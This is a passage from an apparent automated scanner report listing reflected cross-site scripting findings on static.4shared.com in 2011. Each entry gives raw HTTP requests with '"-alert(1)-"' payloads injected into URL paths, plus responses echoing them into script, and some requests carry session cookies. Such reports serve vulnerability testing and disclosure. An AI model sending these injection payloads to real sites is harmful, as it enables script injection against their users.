<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/dw_drag.jsbf87f"-alert(1)-"6f121a1eda2";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.433. http://static.4shared.com/js/dw_event.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/dw_event.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a920"-alert(1)-"365bd27b3c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js7a920"-alert(1)-"365bd27b3c3/dw_event.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js7a920&quot;-alert(1)-&quot;365bd27b3c3/dw_event.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=14ADD58AABB5318B45D845F998D1168A.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:15 GMT
Content-Length: 36165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js7a920"-alert(1)-"365bd27b3c3/dw_event.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.434. http://static.4shared.com/js/dw_event.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/dw_event.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27f2c"-alert(1)-"68c4ab76dbc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/dw_event.js27f2c"-alert(1)-"68c4ab76dbc?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/dw_event.js27f2c&quot;-alert(1)-&quot;68c4ab76dbc
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FA0777C4018C733CAB00C1514B66D2C7.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:18 GMT
Content-Length: 36165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/dw_event.js27f2c"-alert(1)-"68c4ab76dbc";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.435. http://static.4shared.com/js/dw_viewport.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/dw_viewport.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9a31"-alert(1)-"63ff542d0f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsb9a31"-alert(1)-"63ff542d0f7/dw_viewport.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /jsb9a31&quot;-alert(1)-&quot;63ff542d0f7/dw_viewport.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6A9A71F3EE25BF897A04780FEF001C40.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:18 GMT
Content-Length: 36169


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/jsb9a31"-alert(1)-"63ff542d0f7/dw_viewport.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
...[SNIP]...

3.436. http://static.4shared.com/js/dw_viewport.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/dw_viewport.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccc2d"-alert(1)-"2c2ee3eca79 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/dw_viewport.jsccc2d"-alert(1)-"2c2ee3eca79?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/dw_viewport.jsccc2d&quot;-alert(1)-&quot;2c2ee3eca79
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DFCAF3D03EAF65592088FA7DE98267CF.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:21 GMT
Content-Length: 36169


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/dw_viewport.jsccc2d"-alert(1)-"2c2ee3eca79";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.437. http://static.4shared.com/js/dw_writedrag.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/dw_writedrag.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77c70"-alert(1)-"b6cb32f2907 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js77c70"-alert(1)-"b6cb32f2907/dw_writedrag.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js77c70&quot;-alert(1)-&quot;b6cb32f2907/dw_writedrag.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B42FB6A3B5C40554B67136CE43B3F3A9.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:25 GMT
Content-Length: 36185


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js77c70"-alert(1)-"b6cb32f2907/dw_writedrag.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

3.438. http://static.4shared.com/js/dw_writedrag.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/dw_writedrag.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0dfe"-alert(1)-"82ae5dcc5d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/dw_writedrag.jsd0dfe"-alert(1)-"82ae5dcc5d6?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/dw_writedrag.jsd0dfe&quot;-alert(1)-&quot;82ae5dcc5d6
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2FDAEE0E2122E00D757F4E27374A656D.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:29 GMT
Content-Length: 36174


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/dw_writedrag.jsd0dfe"-alert(1)-"82ae5dcc5d6";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.439. http://static.4shared.com/js/index.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/index.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb9c5"-alert(1)-"97dd4e6f4ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jscb9c5"-alert(1)-"97dd4e6f4ff/index.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /jscb9c5&quot;-alert(1)-&quot;97dd4e6f4ff/index.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=44D71914FF632BBB045AD7386A660F6A.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:52 GMT
Content-Length: 36150


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/jscb9c5"-alert(1)-"97dd4e6f4ff/index.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.440. http://static.4shared.com/js/index.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/index.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93e21"-alert(1)-"78ca177c741 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/index.js93e21"-alert(1)-"78ca177c741?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/index.js93e21&quot;-alert(1)-&quot;78ca177c741
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0BDD0F053EB06C78C9916D42FCFFE7AC.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:56 GMT
Content-Length: 36150


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/index.js93e21"-alert(1)-"78ca177c741";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.441. http://static.4shared.com/js/jquery-1.4.4.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/jquery-1.4.4.min.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41e7d"-alert(1)-"6b8c1a3bc02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js41e7d"-alert(1)-"6b8c1a3bc02/jquery-1.4.4.min.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js41e7d&quot;-alert(1)-&quot;6b8c1a3bc02/jquery-1.4.4.min.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=27959477059AB3FDE308F3E82A184D47.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:54 GMT
Content-Length: 36205


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js41e7d"-alert(1)-"6b8c1a3bc02/jquery-1.4.4.min.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedbac
...[SNIP]...

3.442. http://static.4shared.com/js/jquery-1.4.4.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/jquery-1.4.4.min.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2749"-alert(1)-"ee01858fec6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/jquery-1.4.4.min.jsa2749"-alert(1)-"ee01858fec6?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/jquery-1.4.4.min.jsa2749&quot;-alert(1)-&quot;ee01858fec6
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=645AD265F2FDE7DEF72BC64223084E6E.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:57 GMT
Content-Length: 36194


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/jquery-1.4.4.min.jsa2749"-alert(1)-"ee01858fec6";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.443. http://static.4shared.com/js/login_fnc.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/login_fnc.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcd0d"-alert(1)-"c510e79c899 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsdcd0d"-alert(1)-"c510e79c899/login_fnc.js?ver=1611 HTTP/1.1
Host: static.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=931F171FB37FF20EDA0F3732F02AE2BB.dc293; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=559849480; df=""; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __qca=P0-1133200866-1297862349616; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; adu=""; dirPwdVerified="";

Response

HTTP/1.1 404 /jsdcd0d&quot;-alert(1)-&quot;c510e79c899/login_fnc.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1B8B1596CCAE89B1C7DAED6AB2D79C1E.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:08:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/jsdcd0d"-alert(1)-"c510e79c899/login_fnc.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.444. http://static.4shared.com/js/login_fnc.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/login_fnc.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbfde"-alert(1)-"8729de527e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/login_fnc.jsdbfde"-alert(1)-"8729de527e7?ver=1611 HTTP/1.1
Host: static.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=931F171FB37FF20EDA0F3732F02AE2BB.dc293; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=559849480; df=""; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __qca=P0-1133200866-1297862349616; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; adu=""; dirPwdVerified="";

Response

HTTP/1.1 404 /js/login_fnc.jsdbfde&quot;-alert(1)-&quot;8729de527e7
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4B8B80CCAEE7DF3FF35B41734250E503.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:08:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/login_fnc.jsdbfde"-alert(1)-"8729de527e7";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.445. http://static.4shared.com/js/plugins/jquery.openid.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/plugins/jquery.openid.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b36e"-alert(1)-"a65e025b9c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js2b36e"-alert(1)-"a65e025b9c0/plugins/jquery.openid.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js2b36e&quot;-alert(1)-&quot;a65e025b9c0/plugins/jquery.openid.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4079419CE468B6201E564B4D4B0AFC13.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:54 GMT
Content-Length: 36230


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js2b36e"-alert(1)-"a65e025b9c0/plugins/jquery.openid.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function fe
...[SNIP]...

3.446. http://static.4shared.com/js/plugins/jquery.openid.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/plugins/jquery.openid.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 938f0"-alert(1)-"0ba47aec0e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/plugins938f0"-alert(1)-"0ba47aec0e3/jquery.openid.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /js/plugins938f0&quot;-alert(1)-&quot;0ba47aec0e3/jquery.openid.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=98C9E08BA66033E05F22FEFFAB2D92E6.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:00 GMT
Content-Length: 36230


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/js/plugins938f0"-alert(1)-"0ba47aec0e3/jquery.openid.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

3.447. http://static.4shared.com/js/plugins/jquery.openid.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /js/plugins/jquery.openid.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e541a"-alert(1)-"0f1b43c7c9d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

